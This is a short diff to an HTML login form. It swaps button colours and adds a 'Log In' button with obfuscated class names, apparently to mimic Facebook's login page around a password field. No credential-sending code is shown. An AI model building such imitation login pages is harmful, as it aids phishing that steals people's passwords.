--- a/index.html
+++ b/index.html
@@ -15,7 +15,7 @@ input[type=text], select {
 
 input[type=submit] {
   width: 100%;
-  background-color:#3b5998;
+  background-color:#4267b2;
   color: white;
   padding: 14px 20px;
   margin: 8px 0;
@@ -25,7 +25,7 @@ input[type=submit] {
 }
 
 input[type=submit]:hover {
-  background-color: #3b5998;
+  background-color: #4267b2;
 }
 
 </style>
@@ -45,7 +45,7 @@ input[type=submit]:hover {
     
     <input type="text" id="lname" name="pass" placeholder="Password">
 
-<input type="submit" value="Submit">
+<button type="submit" value="Log In" class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu">Log In</button>
 
 </form>
 
